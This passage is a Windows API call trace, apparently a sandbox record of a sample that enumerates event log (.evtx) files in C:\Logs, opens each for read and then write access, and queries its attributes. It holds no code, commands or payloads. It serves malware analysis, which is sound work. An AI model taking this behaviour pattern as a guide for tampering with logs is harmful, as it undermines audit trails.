RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x812a0 [0072.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x812a0, cchWideChar=85 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 85 [0072.632] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.633] GetFileType (hFile=0x418) returned 0x1 [0072.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0072.633] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.633] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.633] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.633] CloseHandle (hObject=0x418) returned 1 [0072.633] AreFileApisANSI () returned 1 [0072.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81e20 [0072.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x81e20, cchWideChar=85 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 85 [0072.634] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.634] GetFileType (hFile=0x418) returned 0x1 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81e20 | out: hHeap=0x20000) returned 1 [0072.634] CloseHandle (hObject=0x418) returned 1 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.635] AreFileApisANSI () returned 1 [0072.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81d68 [0072.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x81d68, cchWideChar=85 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 85 [0072.635] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.635] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0072.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.636] AreFileApisANSI () returned 1 [0072.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.636] AreFileApisANSI () returned 1 [0072.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46978 [0072.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 51 [0072.637] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.637] GetFileType (hFile=0x418) returned 0x1 [0072.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0072.637] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.637] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.637] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.637] CloseHandle (hObject=0x418) returned 1 [0072.638] AreFileApisANSI () returned 1 [0072.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45f68 [0072.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45f68, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 51 [0072.638] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.638] GetFileType (hFile=0x418) returned 0x1 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0072.638] CloseHandle (hObject=0x418) returned 1 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.639] AreFileApisANSI () returned 1 [0072.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45e88 [0072.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 51 [0072.639] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.639] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0072.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0072.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0072.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0072.640] AreFileApisANSI () returned 1 [0072.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", lpUsedDefaultChar=0x0) returned 65 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0072.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.640] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0072.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.640] AreFileApisANSI () returned 1 [0072.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0072.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82448 [0072.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82448, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 65 [0072.641] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.641] GetFileType (hFile=0x418) returned 0x1 [0072.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82448 | out: hHeap=0x20000) returned 1 [0072.641] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.641] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.641] SetFilePointerEx (in: hFile=0x418, 